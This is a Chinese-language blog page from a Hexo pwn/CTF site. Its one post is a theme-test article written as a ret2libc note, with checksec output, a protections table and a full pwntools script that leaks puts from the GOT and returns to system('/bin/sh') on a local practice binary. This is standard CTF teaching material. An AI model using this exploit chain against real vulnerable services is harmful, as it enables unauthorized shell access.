<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>haoo&#39;s pwn house - Startrace 主题效果测试：ret2libc 小记</title>
<meta name="description" content="用一篇模拟 Pwn 笔记测试新主题的排版，包括代码块、表格、引用、列表、目录和搜索。">
<meta name="theme-color" content="#171a18">
<link rel="stylesheet" href="/css/main.css">
<link rel="alternate" type="application/rss+xml" title="haoo&#39;s pwn house RSS" href="/rss.xml">

<meta name="generator" content="Hexo 7.3.0"></head>
<body class="site-body">
  
  <header class="site-header">
  <a class="skip-link" href="#main-content">Skip to content</a>
  <div class="site-header__inner">
    <a class="site-brand" href="/" aria-label="haoo&#39;s pwn house home">
      <span class="site-brand__mark">~/</span>
      <span class="site-brand__text">
        <strong>haoo&#39;s pwn house</strong>
        <small>Pwn / CTF writeups, binary exploitation notes, and practice logs.</small>
      </span>
    </a>

    <button class="menu-toggle" type="button" aria-label="Toggle navigation" aria-expanded="false" aria-controls="site-nav">
      <span></span>
      <span></span>
      <span></span>
    </button>

    <nav id="site-nav" class="site-nav" aria-label="Primary navigation">
      
        <a class="site-nav__link" href="/">Home</a>
      
        <a class="site-nav__link" href="/archives">Archives</a>
      
        <a class="site-nav__link" href="/categories">Categories</a>
      
        <a class="site-nav__link" href="/tags">Tags</a>
      
        <a class="site-nav__link" href="/about">About</a>
      
        <a class="site-nav__link" href="/links">Links</a>
      
        <a class="site-nav__link" href="/rss.xml">RSS</a>
      
    </nav>
  </div>
  <div class="reading-progress" aria-hidden="true"><span></span></div>
</header>


  <main id="main-content" class="site-main article-main">
    <article class="article-wrap">
      <header class="article-header">
        <div class="post-meta">
          <time datetime="2026-06-09">2026-06-09</time>
          <span>3 min read</span>
          <span>1383 chars</span>
        </div>
        <h1>Startrace 主题效果测试：ret2libc 小记</h1>
        
          <div class="tag-list">
            
              <a class="tag-chip tag-chip--solid" href="/categories/Pwn/">Pwn</a>
            
            
              <a class="tag-chip" href="/tags/ret2libc/">ret2libc</a>
            
              <a class="tag-chip" href="/tags/pwntools/">pwntools</a>
            
              <a class="tag-chip" href="/tags/libc/">libc</a>
            
              <a class="tag-chip" href="/tags/theme-test/">theme-test</a>
            
          </div>
        
      </header>

      <div class="article-grid">
        <div class="article-body article-prose" id="article-content">
          <p>这是一篇用于预览新主题的测试文章。后面你可以直接删除或改名，真实文章放进 <code>source/_posts</code> 之后，首页、归档、分类、标签、搜索都会自动跟着更新。</p>
<!-- more -->

<h2 id="快速结论"><a href="#快速结论" class="headerlink" title="快速结论"></a>快速结论</h2><p>这套主题更像一个技术人员维护的实验记录：信息密度高一点，颜色克制一点，重点放在文章标题、代码块、目录和检索上。</p>
<blockquote>
<p>主题测试的目标不是把页面堆满效果，而是让读 writeup 的时候不累，扫归档的时候能快速定位。</p>
</blockquote>
<h2 id="环境检查"><a href="#环境检查" class="headerlink" title="环境检查"></a>环境检查</h2><p>先看一下基础保护：</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">$ checksec ./vuln<br>[*] <span class="hljs-string">&#x27;./vuln&#x27;</span><br>    Arch:       amd64-64-little<br>    RELRO:      Partial RELRO<br>    Stack:      No canary found<br>    NX:         NX enabled<br>    PIE:        No PIE<br></code></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>项目</th>
<th>状态</th>
<th>影响</th>
</tr>
</thead>
<tbody><tr>
<td>Canary</td>
<td>disabled</td>
<td>可以覆盖返回地址</td>
</tr>
<tr>
<td>NX</td>
<td>enabled</td>
<td>需要 ROP 或 ret2libc</td>
</tr>
<tr>
<td>PIE</td>
<td>disabled</td>
<td>程序段地址稳定</td>
</tr>
<tr>
<td>RELRO</td>
<td>partial</td>
<td>GOT 仍有分析价值</td>
</tr>
</tbody></table>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><ol>
<li>泄露 <code>puts@got</code> 的真实地址。</li>
<li>根据 libc 计算 <code>system</code> 和 <code>/bin/sh</code>。</li>
<li>第二次返回到 <code>system(&quot;/bin/sh&quot;)</code>。</li>
</ol>
<figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>elf = ELF(<span class="hljs-string">&quot;./vuln&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;./libc.so.6&quot;</span>)<br>context.binary = elf<br>context.log_level = <span class="hljs-string">&quot;debug&quot;</span><br><br>p = process(elf.path)<br>rop = ROP(elf)<br><br>pop_rdi = rop.find_gadget([<span class="hljs-string">&quot;pop rdi&quot;</span>, <span class="hljs-string">&quot;ret&quot;</span>])[<span class="hljs-number">0</span>]<br>payload = flat(<br>    <span class="hljs-string">b&quot;A&quot;</span> * <span class="hljs-number">72</span>,<br>    pop_rdi,<br>    elf.got[<span class="hljs-string">&quot;puts&quot;</span>],<br>    elf.plt[<span class="hljs-string">&quot;puts&quot;</span>],<br>    elf.symbols[<span class="hljs-string">&quot;main&quot;</span>],<br>)<br><br>p.sendlineafter(<span class="hljs-string">b&quot;input:&quot;</span>, payload)<br>leak = u64(p.recvline().strip().ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&quot;\x00&quot;</span>))<br>libc.address = leak - libc.symbols[<span class="hljs-string">&quot;puts&quot;</span>]<br><br>payload = flat(<br>    <span class="hljs-string">b&quot;A&quot;</span> * <span class="hljs-number">72</span>,<br>    pop_rdi + <span class="hljs-number">1</span>,<br>    pop_rdi,<br>    <span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b&quot;/bin/sh&quot;</span>)),<br>    libc.symbols[<span class="hljs-string">&quot;system&quot;</span>],<br>)<br><br>p.sendlineafter(<span class="hljs-string">b&quot;input:&quot;</span>, payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="记录习惯"><a href="#记录习惯" class="headerlink" title="记录习惯"></a>记录习惯</h2><p>建议每篇文章固定写这几块：</p>
<ul>
<li><code>checksec</code> 和题目信息。</li>
<li>漏洞触发点。</li>
<li>栈布局或堆布局。</li>
<li>exp 调试过程。</li>
<li>最终脚本和复盘。</li>
</ul>
<h2 id="后续可替换"><a href="#后续可替换" class="headerlink" title="后续可替换"></a>后续可替换</h2><p>这篇只是主题测试文章。等你的真实文章恢复后，可以删掉这个文件，或者保留它当作 Markdown 排版模板。</p>

        </div>

        
          <aside class="toc-panel" aria-label="Table of contents">
            <div class="toc-panel__head">
              <h2>Contents</h2>
              <button class="toc-top" type="button">Top</button>
            </div>
            <nav id="toc"></nav>
          </aside>
        
      </div>

      <nav class="article-nav" aria-label="Post navigation">
        
        
      </nav>
    </article>
  </main>

  <footer class="site-footer">
  <div class="site-footer__inner">
    <p><strong>haoo&#39;s pwn house</strong> | 1 posts | <a href="/rss.xml">RSS</a></p>
    <p><span id="current-year"></span> haoo. Built with Hexo and the Startrace theme.</p>
  </div>
</footer>
<script src="/js/theme.js" defer></script>

</body>
</html>
